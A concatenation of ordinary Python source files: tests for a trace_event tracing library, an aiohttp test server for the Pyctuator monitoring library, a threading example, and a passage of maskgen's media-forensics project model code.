self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue(current_entry['args']['argv'])
self.assertEquals(current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], expected_name)
self.assertEquals(current_entry['args']['this'], '\'that\'')
self.assertEquals(current_entry['ph'], 'B')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], expected_name)
self.assertEquals(current_entry['args'], {})
self.assertEquals(current_entry['ph'], 'E')
def testClockSyncWithTs(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.clock_sync('id', issue_ts=trace_time.Now())
trace_event.trace_flush()
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 2)
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue(current_entry['args']['argv'])
self.assertEquals(current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'clock_sync')
self.assertTrue(current_entry['args']['issue_ts'])
self.assertEquals(current_entry['ph'], 'c')
def testClockSyncWithoutTs(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.clock_sync('id')
trace_event.trace_flush()
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 2)
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue(current_entry['args']['argv'])
self.assertEquals(current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'clock_sync')
self.assertFalse(current_entry['args'].get('issue_ts'))
self.assertEquals(current_entry['ph'], 'c')
def testTime(self):
actual_diff = []
def func1():
trace_begin("func1")
start = time.time()
time.sleep(0.25)
end = time.time()
actual_diff.append(end-start) # Pass via array because of Python scoping
trace_end("func1")
with self._test_trace():
start_ts = time.time()
trace_event.trace_begin('test')
end_ts = time.time()
trace_event.trace_end('test')
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 3)
meta_data = log_output[0]
open_data = log_output[1]
close_data = log_output[2]
self.assertEquals(meta_data['category'], 'process_argv')
self.assertEquals(meta_data['name'], 'process_argv')
self.assertTrue(meta_data['args']['argv'])
self.assertEquals(meta_data['ph'], 'M')
self.assertEquals(open_data['category'], 'python')
self.assertEquals(open_data['name'], 'test')
self.assertEquals(open_data['ph'], 'B')
self.assertEquals(close_data['category'], 'python')
self.assertEquals(close_data['name'], 'test')
self.assertEquals(close_data['ph'], 'E')
event_time_diff = close_data['ts'] - open_data['ts']
recorded_time_diff = (end_ts - start_ts) * 1000000
self.assertLess(math.fabs(event_time_diff - recorded_time_diff), 1000)
def testNestedCalls(self):
with self._test_trace():
trace_event.trace_begin('one')
trace_event.trace_begin('two')
trace_event.trace_end('two')
trace_event.trace_end('one')
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 5)
meta_data = log_output[0]
one_open = log_output[1]
two_open = log_output[2]
two_close = log_output[3]
one_close = log_output[4]
self.assertEquals(meta_data['category'], 'process_argv')
self.assertEquals(meta_data['name'], 'process_argv')
self.assertTrue(meta_data['args']['argv'])
self.assertEquals(meta_data['ph'], 'M')
self.assertEquals(one_open['category'], 'python')
self.assertEquals(one_open['name'], 'one')
self.assertEquals(one_open['ph'], 'B')
self.assertEquals(one_close['category'], 'python')
self.assertEquals(one_close['name'], 'one')
self.assertEquals(one_close['ph'], 'E')
self.assertEquals(two_open['category'], 'python')
self.assertEquals(two_open['name'], 'two')
self.assertEquals(two_open['ph'], 'B')
self.assertEquals(two_close['category'], 'python')
self.assertEquals(two_close['name'], 'two')
self.assertEquals(two_close['ph'], 'E')
self.assertLessEqual(one_open['ts'], two_open['ts'])
self.assertGreaterEqual(one_close['ts'], two_close['ts'])
def testInterleavedCalls(self):
with self._test_trace():
trace_event.trace_begin('one')
trace_event.trace_begin('two')
trace_event.trace_end('one')
trace_event.trace_end('two')
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 5)
meta_data = log_output[0]
one_open = log_output[1]
two_open = log_output[2]
two_close = log_output[4]
one_close = log_output[3]
self.assertEquals(meta_data['category'], 'process_argv')
self.assertEquals(meta_data['name'], 'process_argv')
self.assertTrue(meta_data['args']['argv'])
self.assertEquals(meta_data['ph'], 'M')
self.assertEquals(one_open['category'], 'python')
self.assertEquals(one_open['name'], 'one')
self.assertEquals(one_open['ph'], 'B')
self.assertEquals(one_close['category'], 'python')
self.assertEquals(one_close['name'], 'one')
self.assertEquals(one_close['ph'], 'E')
self.assertEquals(two_open['category'], 'python')
self.assertEquals(two_open['name'], 'two')
self.assertEquals(two_open['ph'], 'B')
self.assertEquals(two_close['category'], 'python')
self.assertEquals(two_close['name'], 'two')
self.assertEquals(two_close['ph'], 'E')
self.assertLessEqual(one_open['ts'], two_open['ts'])
self.assertLessEqual(one_close['ts'], two_close['ts'])
# TODO(khokhlov): Fix this test on Windows. See crbug.com/945819 for details.
def disabled_testMultiprocess(self):
def child_function():
with trace_event.trace('child_event'):
pass
with self._test_trace():
trace_event.trace_begin('parent_event')
trace_event.trace_flush()
p = multiprocessing.Process(target=child_function)
p.start()
self.assertTrue(hasattr(p, "_shimmed_by_trace_event"))
p.join()
trace_event.trace_end('parent_event')
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 5)
meta_data = log_output[0]
parent_open = log_output[1]
child_open = log_output[2]
child_close = log_output[3]
parent_close = log_output[4]
self.assertEquals(meta_data['category'], 'process_argv')
self.assertEquals(meta_data['name'], 'process_argv')
self.assertTrue(meta_data['args']['argv'])
self.assertEquals(meta_data['ph'], 'M')
self.assertEquals(parent_open['category'], 'python')
self.assertEquals(parent_open['name'], 'parent_event')
self.assertEquals(parent_open['ph'], 'B')
self.assertEquals(child_open['category'], 'python')
self.assertEquals(child_open['name'], 'child_event')
self.assertEquals(child_open['ph'], 'B')
self.assertEquals(child_close['category'], 'python')
self.assertEquals(child_close['name'], 'child_event')
self.assertEquals(child_close['ph'], 'E')
self.assertEquals(parent_close['category'], 'python')
self.assertEquals(parent_close['name'], 'parent_event')
self.assertEquals(parent_close['ph'], 'E')
@unittest.skipIf(sys.platform == 'win32', 'crbug.com/945819')
def testTracingControlDisabledInChildButNotInParent(self):
def child(resp):
# test tracing is not controllable in the child
resp.put(trace_event.is_tracing_controllable())
with self._test_trace():
q = multiprocessing.Queue()
p = multiprocessing.Process(target=child, args=[q])
p.start()
# test tracing is controllable in the parent
self.assertTrue(trace_event.is_tracing_controllable())
self.assertFalse(q.get())
p.join()
def testMultiprocessExceptionInChild(self):
def bad_child():
trace_event.trace_disable()
with self._test_trace():
p = multiprocessing.Pool(1)
trace_event.trace_begin('parent')
self.assertRaises(Exception, lambda: p.apply(bad_child, ()))
p.close()
p.terminate()
p.join()
trace_event.trace_end('parent')
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 3)
meta_data = log_output[0]
parent_open = log_output[1]
parent_close = log_output[2]
self.assertEquals(parent_open['category'], 'python')
self.assertEquals(parent_open['name'], 'parent')
self.assertEquals(parent_open['ph'], 'B')
self.assertEquals(parent_close['category'], 'python')
self.assertEquals(parent_close['name'], 'parent')
self.assertEquals(parent_close['ph'], 'E')
def testFormatJson(self):
with self._test_trace(format=trace_event.JSON):
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 1)
self.assertEquals(log_output[0]['ph'], 'M')
def testFormatJsonWithMetadata(self):
with self._test_trace(format=trace_event.JSON_WITH_METADATA):
trace_event.trace_disable()
with open(self._log_path, 'r') as f:
log_output = json.load(f)
self.assertEquals(len(log_output), 2)
events = log_output['traceEvents']
self.assertEquals(len(events), 1)
self.assertEquals(events[0]['ph'], 'M')
def testFormatProtobuf(self):
with self._test_trace(format=trace_event.PROTOBUF):
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
self.assertGreater(len(f.read()), 0)
def testAddMetadata(self):
with self._test_trace(format=trace_event.JSON_WITH_METADATA):
trace_event.trace_add_benchmark_metadata(
benchmark_start_time_us=1000,
story_run_time_us=2000,
benchmark_name='benchmark',
benchmark_description='desc',
story_name='story',
story_tags=['tag1', 'tag2'],
story_run_index=0,
)
trace_event.trace_disable()
with open(self._log_path, 'r') as f:
log_output = json.load(f)
self.assertEquals(len(log_output), 2)
telemetry_metadata = log_output['metadata']['telemetry']
self.assertEquals(len(telemetry_metadata), 7)
self.assertEquals(telemetry_metadata['benchmarkStart'], 1)
self.assertEquals(telemetry_metadata['traceStart'], 2)
self.assertEquals(telemetry_metadata['benchmarks'], ['benchmark'])
self.assertEquals(telemetry_metadata['benchmarkDescriptions'], ['desc'])
self.assertEquals(telemetry_metadata['stories'], ['story'])
self.assertEquals(telemetry_metadata['storyTags'], ['tag1', 'tag2'])
self.assertEquals(telemetry_metadata['storysetRepeats'], [0])
def testAddMetadataProtobuf(self):
with self._test_trace(format=trace_event.PROTOBUF):
trace_event.trace_add_benchmark_metadata(
benchmark_start_time_us=1000,
story_run_time_us=2000,
benchmark_name='benchmark',
benchmark_description='desc',
story_name='story',
story_tags=['tag1', 'tag2'],
story_run_index=0,
)
trace_event.trace_disable()
with open(self._log_path, 'r') as f:
self.assertGreater(len(f.read()), 0)
def testAddMetadataInJsonFormatRaises(self):
with self._test_trace(format=trace_event.JSON):
with self.assertRaises(log.TraceException):
trace_event.trace_add_benchmark_metadata(
benchmark_start_time_us=1000,
story_run_time_us=2000,
benchmark_name='benchmark',
benchmark_description='description',
story_name='story',
story_tags=['tag1', 'tag2'],
story_run_index=0,
)
def testSetClockSnapshotProtobuf(self):
trace_event.trace_set_clock_snapshot(
telemetry_ts=1234.5678,
boottime_ts=8765.4321,
)
with self._test_trace(format=trace_event.PROTOBUF):
trace_event.trace_disable()
with open(self._log_path, 'r') as f:
self.assertGreater(len(f.read()), 0)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main(verbosity=2)
|
aiohttp_test_server.py
|
import asyncio
import logging
import threading
import time
from aiohttp import web
from pyctuator.pyctuator import Pyctuator
from tests.conftest import PyctuatorServer
# mypy: ignore_errors
# pylint: disable=unused-variable
class AiohttpPyctuatorServer(PyctuatorServer):
def __init__(self) -> None:
self.app = web.Application()
self.routes = web.RouteTableDef()
self.pyctuator = Pyctuator(
self.app,
"AIOHTTP Pyctuator",
"http://localhost:8888",
"http://localhost:8888/pyctuator",
"http://localhost:8001/register",
registration_interval_sec=1,
metadata=self.metadata,
additional_app_info=self.additional_app_info,
)
@self.routes.get("/logfile_test_repeater")
async def logfile_test_repeater(request: web.Request) -> web.Response:
repeated_string = request.query.get("repeated_string")
logging.error(repeated_string)
return web.Response(text=repeated_string)
@self.routes.get("/httptrace_test_url")
async def get_httptrace_test_url(request: web.Request) -> web.Response:
# Sleep if requested to sleep - used for asserting httptraces timing
sleep_sec = request.query.get("sleep_sec")
if sleep_sec:
logging.info("Sleeping %s seconds before replying", sleep_sec)
time.sleep(int(sleep_sec))
# Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly
headers = {
"resp-data": str(request.headers.get("User-Data")),
"response-secret": "my password"
}
return web.Response(headers=headers, body="my content")
self.app.add_routes(self.routes)
self.thread = threading.Thread(target=self._start_in_thread)
self.should_stop_server = False
self.server_started = False
async def _run_server(self) -> None:
logging.info("Preparing to start aiohttp server")
runner = web.AppRunner(self.app)
await runner.setup()
logging.info("Starting aiohttp server")
site = web.TCPSite(runner, port=8888)
await site.start()
self.server_started = True
logging.info("aiohttp server started")
while not self.should_stop_server:
await asyncio.sleep(1)
logging.info("Shutting down aiohttp server")
await runner.shutdown()
await runner.cleanup()
logging.info("aiohttp server is shutdown")
def _start_in_thread(self) -> None:
loop = asyncio.new_event_loop()
loop.run_until_complete(self._run_server())
loop.stop()
def start(self) -> None:
self.thread.start()
while not self.server_started:
time.sleep(0.01)
def stop(self) -> None:
logging.info("Stopping aiohttp server")
self.pyctuator.stop()
self.should_stop_server = True
self.thread.join()
logging.info("aiohttp server stopped")
def atexit(self) -> None:
if self.pyctuator.boot_admin_registration_handler:
self.pyctuator.boot_admin_registration_handler.deregister_from_admin_server()
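# Minimal usage sketch, as driven by the test fixtures (not part of the
# original module):
#   server = AiohttpPyctuatorServer()
#   server.start()
#   # ... exercise http://localhost:8888/pyctuator endpoints ...
#   server.stop()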
|
thread.py
|
# thread
import time, threading
def loop():
print('thread %s is running...' % threading.current_thread().name)
n = 0
while n < 5:
n = n + 1
print('thread %s >>> %s' % (threading.current_thread().name, n))
time.sleep(1)
print('thread %s ended.' % threading.current_thread().name)
print('thread %s is running...' % threading.current_thread().name)
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print('thread %s ended.' % threading.current_thread().name)
|
scenario_model.py
|
# =============================================================================
# Authors: PAR Government
# Organization: DARPA
#
# Copyright (c) 2016 PAR Government
# All rights reserved.
# ==============================================================================
import collections
import copy
import shutil
import tempfile
import traceback
from threading import Lock
import ffmpeg_api
import graph_rules
import mask_rules
import notifiers
import plugins
import video_tools
from graph_auto_updates import updateJournal
from group_filter import buildFilterOperation, GroupFilter, GroupOperationsLoader
from image_graph import createGraph
from image_wrap import ImageWrapper
from maskgen.image_graph import ImageGraph
from maskgen.video_tools import DummyMemory
from support import MaskgenThreadPool, StatusTracker, getPathValuesFunc, getPathValues
from software_loader import Software, getProjectProperties, getRule, getOperation
from tool_set import *
from validation.core import Validator, ValidationMessage,Severity,removeErrorMessages
def formatStat(val):
if type(val) == float:
return "{:5.3f}".format(val)
return str(val)
prefLoader = MaskGenLoader()
def defaultNotify(edge, message, **kwargs):
return True
def loadProject(projectFileName, notify=None, username=None, tool=None):
"""
Given JSON file name, open then the appropriate type of project
@rtype: ImageProjectModel
"""
graph = createGraph(projectFileName, tool=tool)
return ImageProjectModel(projectFileName, graph=graph, notify=notify, username=username, tool=tool)
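# Minimal usage sketch (the file name is hypothetical):
#   model = loadProject('/path/to/project.json')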
def consolidate(dict1, dict2):
"""
:param dict1:
:param dict2:
:return:
@rtype dict
"""
d = dict(dict1)
d.update(dict2)
return d
EdgeTuple = collections.namedtuple('EdgeTuple', ['start', 'end', 'edge'])
def createProject(path,
notify=None,
base=None,
name=None,
suffixes=[],
tool=None,
username=None,
organization=None,
preferences={}):
"""
This utility function creates a ProjectModel given a directory.
If the directory contains a JSON file, then that file is used as the project file.
Otherwise, the directory is inspected for images.
All images found in the directory are imported into the project.
If the 'base' parameter is provided, the project is named based on that image name.
If the 'base' parameter is not provided, the project name is set based on finding the
first image in the list of found images, sorted in lexicographic order, starting with JPG, then PNG and then TIFF.
:param path: directory name or JSON file
:param notify: function pointer receiving the image (node) id and the event type
:param base: image name
    :param suffixes: file suffixes (e.g. '.jpg') used when searching for a base image/video
    :param tool:
    :param organization:
    :return: a tuple (project, created): the project found or created, and True if it was newly created.
             Returns None if a project cannot be found or created.
@type path: str
@type notify: (str, str) -> None
@rtype: (ImageProjectModel, bool)
"""
if path is None:
path = '.'
selectionSet = [filename for filename in os.listdir(path) if filename.endswith(".json") and \
filename not in ['operations.json','project_properties.json']]
if len(selectionSet) == 0:
return ImageProjectModel(os.path.join('.', 'Untitled.json'), notify=notify, username=username, tool=tool), True
else:
if (path.endswith(".json")) and os.path.exists(path):
return ImageProjectModel(os.path.abspath(path), notify=notify, username=username, tool=tool), False
# just a directory
selectionSet = [filename for filename in os.listdir(path) if filename.endswith(".json")]
if len(selectionSet) != 0 and base is not None:
logging.getLogger('maskgen').warning('Cannot add base image/video to an existing project')
return None
# JSON file not found and base image not provided
if len(selectionSet) == 0 and base is None:
logging.getLogger('maskgen').info(
'No project found and base image/video not provided; Searching for a base image/video')
suffixPos = 0
# look for a viable media file to create the project
while len(selectionSet) == 0 and suffixPos < len(suffixes):
suffix = suffixes[suffixPos]
selectionSet = [filename for filename in os.listdir(path) if filename.lower().endswith(suffix)]
selectionSet.sort()
suffixPos += 1
if len(selectionSet) == 0:
logging.getLogger('maskgen').warning('Could not find a base image/video')
return None
projectFile = selectionSet[0]
# add base is not None
elif len(selectionSet) == 0:
projectFile = os.path.split(base)[1]
else:
projectFile = selectionSet[0]
projectFile = os.path.abspath(os.path.join(path, projectFile))
if not os.path.exists(projectFile):
logging.getLogger('maskgen').warning('Base project file ' + projectFile + ' not found')
return None
image = None
existingProject = projectFile.endswith(".json")
if not existingProject:
image = projectFile
if name is None:
projectFile = os.path.splitext(projectFile)[0] + ".json"
else:
projectFile = os.path.abspath(os.path.join(path, name + ".json"))
model = ImageProjectModel(projectFile, notify=notify, baseImageFileName=image, username=username, tool=tool)
if organization is not None:
model.setProjectData('organization', organization)
if image is not None:
model.addImagesFromDir(path, baseImageFileName=os.path.split(image)[1], suffixes=suffixes, \
sortalg=lambda f: os.stat(os.path.join(path, f)).st_mtime, preferences=preferences)
return model, not existingProject
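# Illustrative usage sketch of createProject (directory, suffixes and
# organization values are hypothetical; None is returned when no project can
# be found or created):
#   result = createProject('/path/to/journal_dir',
#                          suffixes=['.jpg', '.png', '.tiff'],
#                          organization='ExampleOrg')
#   if result is not None:
#       model, created = result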
class MetaDiff:
diffData = None
def __init__(self, diffData):
self.diffData = diffData
def getMetaType(self):
return 'EXIF'
def getSections(self):
return None
def getColumnNames(self, section):
return ['Operation', 'Old', 'New']
def toColumns(self, section):
d = {}
for k, v in self.diffData.iteritems():
old = v[1] if v[0].lower() == 'change' or v[0].lower() == 'delete' else ''
new = v[2] if v[0].lower() == 'change' else (v[1] if v[0].lower() == 'add' else '')
old = old.encode('ascii', 'xmlcharrefreplace')
new = new.encode('ascii', 'xmlcharrefreplace')
d[k] = {'Operation': v[0], 'Old': old, 'New': new}
return d
class VideoMetaDiff:
"""
Video Meta-data changes are represented by section.
A special section called Global represents meta-data for the entire video.
Other sections are in the individual streams (e.g. video and audio) of frames.
A table of columns is produced per section. The columns are Id, Operation, Old and New.
Operations are add, delete and change.
For streams, each row is identified by a time and meta-data name.
When frames are added, the New column contains the number of frames added followed by the end time in seconds: 30:=434.4343434
When frames are deleted, the Old column contains the number of frames removed followed by the end time in seconds: 30:=434.4343434
"""
diffData = None
def __init__(self, diffData):
self.diffData = diffData
def getMetaType(self):
return 'FRAME'
def getSections(self):
return self.diffData.keys()
def getColumnNames(self, section):
return ['Operation', 'Old', 'New']
def toColumns(self, section):
d = {}
if len(self.diffData) == 0:
return d
if section is None:
section = self.diffData.keys()[0]
self._sectionChanges(d, self.diffData[section])
return d
def _sectionChanges(self, d, sectionData, prefix=''):
for k, v in sectionData.iteritems():
dictKey = str(k)
old = v[1] if v[0].lower() == 'change' or v[0].lower() == 'delete' else ''
new = v[2] if v[0].lower() == 'change' else (v[1] if v[0].lower() == 'add' else '')
if type(old) is not str:
old = str(old)
if type(new) is not str:
new = str(new)
old = old.encode('ascii', 'xmlcharrefreplace')
new = new.encode('ascii', 'xmlcharrefreplace')
d[dictKey] = {'Operation': v[0], 'Old': old, 'New': new}
class Modification:
"""
Represents a single manipulation to a source node, resulting in the target node
"""
operationName = None
additionalInfo = ''
# for backward compatibility and ease of access, input mask name is both arguments and
# an instance variable
inputMaskName = None
# set of masks used for videos
maskSet = None
# Record the link in the composite. Uses 'no' and 'yes' to mirror JSON readability
recordMaskInComposite = 'no'
# arguments used by the operation
arguments = dict()
# instance of Software
software = None
# automated
automated = 'no'
# errors
errors = list()
# generate mask
generateMask = "all"
username = ''
ctime = ''
start = ''
end = ''
semanticGroups = None
def __init__(self, operationName, additionalInfo,
start='',
end='',
arguments={},
recordMaskInComposite=None,
changeMaskName=None,
inputMaskName=None,
software=None,
maskSet=None,
automated=None,
username=None,
ctime=None,
errors=list(),
semanticGroups=None,
category=None,
generateMask="all"):
self.start = start
self.end = end
self.additionalInfo = additionalInfo
self.maskSet = maskSet
self.automated = automated if automated else 'no'
self.errors = errors if errors else list()
self.operationName = operationName
self.setArguments(arguments)
self.semanticGroups = semanticGroups
if inputMaskName is not None:
self.setInputMaskName(inputMaskName)
self.changeMaskName = changeMaskName
self.username = username if username is not None else ''
self.ctime = ctime if ctime is not None else datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S')
self.software = software
if recordMaskInComposite is not None:
self.recordMaskInComposite = recordMaskInComposite
self.category = category
self.generateMask = generateMask
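# Illustrative construction sketch (the operation name and argument values are
# hypothetical and must correspond to entries in the loaded operations dictionary):
#   mod = Modification('PasteSplice', 'pasted a donor region',
#                      arguments={'purpose': 'add'},
#                      recordMaskInComposite='yes',
#                      automated='no')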
def getSemanticGroups(self):
return [] if self.semanticGroups is None else self.semanticGroups
def setSemanticGroups(self, groups):
self.semanticGroups = groups
def setErrors(self, val):
self.errors = val if val else list()
def setAutomated(self, val):
self.automated = 'yes' if val == 'yes' else 'no'
def setMaskSet(self, maskset):
self.maskSet = maskset
def getSoftwareName(self):
return self.software.name if self.software is not None and self.software.name is not None else ''
def getSoftwareVersion(self):
return self.software.version if self.software is not None and self.software.version is not None else ''
def setSoftware(self, software):
self.software = software
def setArguments(self, args):
self.arguments = dict()
for k, v in args.iteritems():
self.arguments[k] = v
if k == 'inputmaskname':
self.setInputMaskName(v)
def setInputMaskName(self, inputMaskName):
self.inputMaskName = inputMaskName
if 'inputmaskname' not in self.arguments or self.arguments['inputmaskname'] != inputMaskName:
self.arguments['inputmaskname'] = inputMaskName
def setAdditionalInfo(self, info):
self.additionalInfo = info
def setRecordMaskInComposite(self, recordMaskInComposite):
self.recordMaskInComposite = recordMaskInComposite
def setOperationName(self, name):
self.operationName = name
def setFromOperation(self,op,filetype='image'):
"""
:param op:
:return:
@type op: Operation
"""
self.category = op.category
self.generateMask = op.generateMask
self.recordMaskInComposite = op.recordMaskInComposite(filetype)
class LinkTool:
"""
LinkTools are used to handle the comparison and analysis of each edge (link) in the graph.
The link tools are organized by transitions of
media type: video->image, video->video, audio->video, etc.
"""
def __init__(self):
return
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.donothing_processor"
def processDonors(self, scModel, start, destination, startIm, startFileName, destIm, destFileName, arguments, invert=False):
"""
:param scModel:
:param destination:
:param startIm:
:param startFileName:
:param destIm:
:param arguments:
:param invert:
:return:
@type scModel: ImageProjectModel
"""
result = scModel.getCreatingOperation(destination)
if result is not None:
return result[1].getDonorProcessor(default_processor=self.getDefaultDonorProcessor())(
scModel.getGraph(),
start,
destination,
result[0],
(startIm, startFileName),
(destIm, destFileName)).create(arguments=arguments,
invert=invert)
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
return None, {}, []
def _addAnalysis(self, startIm, destIm, op, analysis, mask, linktype=None,
arguments={}, start=None, end=None, scModel=None):
"""
Add analysis to dictionary
:param startIm:
:param destIm:
:param op:
:param analysis: fill this dictionary
:param mask:
:param linktype:
:param arguments:
:param start:
:param end:
:param scModel:
:return:
@type scModel: ImageProjectModel
"""
import importlib
directory = scModel.get_dir()
opData = scModel.gopLoader.getOperationWithGroups(op)
if opData is None:
return
arguments = dict(arguments)
arguments['start_node'] = start
arguments['end_node'] = end
arguments['sc_model'] = scModel
for analysisOp in opData.analysisOperations:
mod_name, func_name = analysisOp.rsplit('.', 1)
try:
mod = importlib.import_module(mod_name)
func = getattr(mod, func_name)
func(analysis, startIm, destIm, mask=invertMask(mask), linktype=linktype,
arguments=arguments,
directory=directory)
except Exception as e:
logging.getLogger('maskgen').error('Failed to run analysis {}: {} '.format(analysisOp, str(e)))
def addSubstituteMasks(self, start, destination, scModel, op, arguments={}, filename=''):
return None
class ImageImageLinkTool(LinkTool):
"""
Supports mask construction and meta-data comparison when linking images to images.
"""
def __init__(self):
LinkTool.__init__(self)
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask and the analysis results (a dictionary)
"""
im1 = scModel.getImage(start)
im2 = scModel.getImage(end)
edge = scModel.G.get_edge(start, end)
compareFunction = None
if edge is not None:
operation = scModel.gopLoader.getOperationWithGroups(edge['op'] if edge is not None else 'NA', fake=True)
compareFunction = operation.getCompareFunction()
mask, analysis, error = createMask(im1, im2, invert=False, arguments=arguments,
alternativeFunction=compareFunction)
if error is not None:
logging.getLogger('maskgen').warn('Failed mask generation for operation {} between {} and {}'.format(
edge['op'] if edge is not None else 'NA',
start,
end
))
return im1, im2, mask, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
"""
:param start:
:param destination:
:param scModel:
:param op:
:param invert:
:param arguments:
:param skipDonorAnalysis:
:param analysis_params:
:return:
@type scModel: ImageProjectModel
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
errors = list()
operation = scModel.gopLoader.getOperationWithGroups(op)
if op == 'Donor':
predecessors = scModel.G.predecessors(destination)
mask = None
expect_donor_mask = False
analysis = {}
if not skipDonorAnalysis:
errors = list()
mask = self.processDonors(scModel, start, destination, startIm, startFileName, destIm, destFileName,
consolidate(arguments, analysis_params), invert=invert)
if mask is None:
mask = convertToMask(startIm).invert()
if expect_donor_mask:
errors = ["Donor image has insufficient features for SIFT and does not have a predecessor node."]
analysis = {}
else:
mask = startIm.apply_alpha_to_mask(mask)
else:
logging.getLogger('maskgen').debug('Create Mask')
mask, analysis, error = createMask(startIm,
destIm,
invert=invert,
arguments=arguments,
alternativeFunction=operation.getCompareFunction(),
convertFunction=operation.getConvertFunction())
if error is not None:
errors.append(error)
logging.getLogger('maskgen').warn('Failed mask generation for operation {} between {} and {}'.format(
op,
start,
destination
))
logging.getLogger('maskgen').debug('EXIF Compare')
exifDiff = exif.compareexif(startFileName, destFileName)
analysis = analysis if analysis is not None else {}
analysis['exifdiff'] = exifDiff
logging.getLogger('maskgen').debug('Analysis')
self._addAnalysis(startIm, destIm, op, analysis, mask, linktype='image.image',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
class VideoImageLinkTool(ImageImageLinkTool):
"""
Supports mask construction and meta-data comparison when linking video to image.
"""
def __init__(self):
ImageImageLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.video_without_audio_donor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask and the analysis results (a dictionary)
"""
im1, startFileName = scModel.getImageAndName(start, arguments=arguments)
im2, destFileName = scModel.getImageAndName(end)
edge = scModel.G.get_edge(start, end)
operation = scModel.gopLoader.getOperationWithGroups(edge['op'])
mask, analysis,error = createMask(im1, im2, invert=False, arguments=arguments,
alternativeFunction=operation.getCompareFunction())
if error is not None:
logging.getLogger('maskgen').warn('Failed mask generation for operation {} between {} and {}'.format(
edge['op'] if edge is not None else 'NA',
start,
end
))
return im1, im2, mask, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
args = dict(arguments)
args['skipSnapshot'] = True
startIm, startFileName = scModel.getImageAndName(start, arguments=args)
destIm, destFileName = scModel.getImageAndName(destination)
errors = list()
operation = scModel.gopLoader.getOperationWithGroups(op)
mask, analysis = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8')), {}
if op == 'Donor':
errors = [
"An video cannot directly donate to an image. First select a frame using an appropriate operation."]
analysis = {}
else:
mask, analysis,error = createMask(startIm, destIm, invert=invert, arguments=arguments,
alternativeFunction=operation.getCompareFunction())
if error is not None:
errors.append(error)
logging.getLogger('maskgen').warn('Failed mask generation for operation {} between {} and {}'.format(
op,
start,
destination
))
exifDiff = exif.compareexif(startFileName, destFileName)
analysis = analysis if analysis is not None else {}
analysis['exifdiff'] = exifDiff
self._addAnalysis(startIm, destIm, op, analysis, mask, linktype='video.image',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
class ZipImageLinkTool(VideoImageLinkTool):
"""
Supports mask construction and meta-data comparison when linking zip to image.
"""
def __init__(self):
VideoImageLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.donothing_stream_processor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(end)
mask, analysis, errors = self.compareImages(start, end, scModel, 'noOp', skipDonorAnalysis=True,
arguments=arguments, analysis_params={})
if 'videomasks' in analysis:
analysis['videomasks'] = VideoMaskSetInfo(analysis['videomasks'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return startIm, destIm, mask, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
"""
:param start:
:param destination:
:param scModel:
:param op:
:param invert:
:param arguments:
:param skipDonorAnalysis:
:param analysis_params:
:return:
@type start: str
@type destination: str
@type scModel: ImageProjectModel
@type op: str
@type invert: bool
@type arguments: dict
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask, analysis = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8')), {}
